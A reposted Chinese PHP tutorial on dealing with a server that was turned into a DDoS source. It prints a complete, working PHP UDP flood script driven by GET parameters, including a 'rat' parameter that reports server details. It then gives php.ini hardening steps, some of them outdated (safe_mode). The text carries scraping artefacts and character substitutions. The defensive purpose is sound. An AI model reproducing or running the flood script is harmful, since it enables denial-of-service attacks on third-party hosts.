《PHP學習:php的ddos攻擊解決方法》要點:
本文介紹了PHP學習:php的ddos攻擊解決方法,希望對您有用。如果有疑問,可以聯系我們。
本文實例講述了php的ddos攻擊解決辦法.分享給大家供大家參考.具體分析如下:PHP應用
今天自己的一臺機器突然向外部發送大量數據包,可每秒到1G以上,雖然我用策略把UDP禁止包是發不出去但是很占cup啊,所以想到最后還是想方法解決了.PHP應用
先看源碼,代碼如下:
PHP應用
代碼如下:
<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);
?
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
??????? if (StrLen($_GET['rat'])<>0){
??????????????? echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
??????????????? exit;
??????????? }
??????? echo "Parameters can not be empty!";
??????? exit;
??? }
?
for($i=0;$i<$Sendlen;$i++){
??????? $out .= "A";
??? }
?
$max_time = time()+$exec_time;
?
while(1){
??? $packets++;
??? if(time() > $max_time){
??????? break;
??? }
??? $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
??????? if($fp){
??????????? fwrite($fp, $out);
??????????? fclose($fp);
??? }
}
?
echo "Send Host:$host:$port<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>
關鍵代碼在于如下:
代碼如下:
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
辦法很簡單,向目標主機發送UDP包,在加上定義無限死循環,就會形成較大的壓力.PHP應用
這個壓力是對于執行這個腳本的服務器來說的,因為它首先對自身的網寬、CPU等資源造成大量占用,如果想用這個腳本對目標站點形成壓力,需要在多個服務器上執行該腳本,DDOS嘛,既然是用fsockopen哀求外部,那就不讓他哀求.PHP應用
php.ini里設置,代碼如下:
PHP應用
代碼如下:
allow_url_fopen = Off
如果這樣他還是能發包,代碼如下:PHP應用
extension=php_sockets.dllPHP應用
改成PHP應用
;extension=php_sockets.dllPHP應用
重啟APACHE、IIS、NGINX,這樣就可以防止PHP DDOS發包了.PHP應用
另外有網友說,讓腳本不允許設置為不超時很簡單:PHP應用
1. 把set_time_limit函數禁用PHP應用
2. 啟用PHP的平安模式(safe_mode=on).PHP應用
禁用socket函數可以把把socket模塊直接全部禁用也可以禁用fsockopen函數,建議,由于socket常用于發送郵件找回密碼,因此建議開啟直接開啟平安模式,但是這樣的話,腳本每30秒超時一次,估計沒有哪個“黑客”寂寞到每30秒去點一下開始DDOS.PHP應用
經驗:這種問題一般是網站平安引起的,我們要注意網站的平安及服務器的平安,這樣就不容易被入侵了,如果會用macofee的朋友,對網站進行限制一下就會更好一些.PHP應用
希望本文所述對大家的php程序設計有所贊助.PHP應用
維易PHP培訓學院每天發布《PHP學習:php的ddos攻擊解決方法》等實戰技能,PHP、MYSQL、LINUX、APP、JS,CSS全面培養人才。
轉載請注明本頁網址:
http://www.fzlkiss.com/jiaocheng/12796.html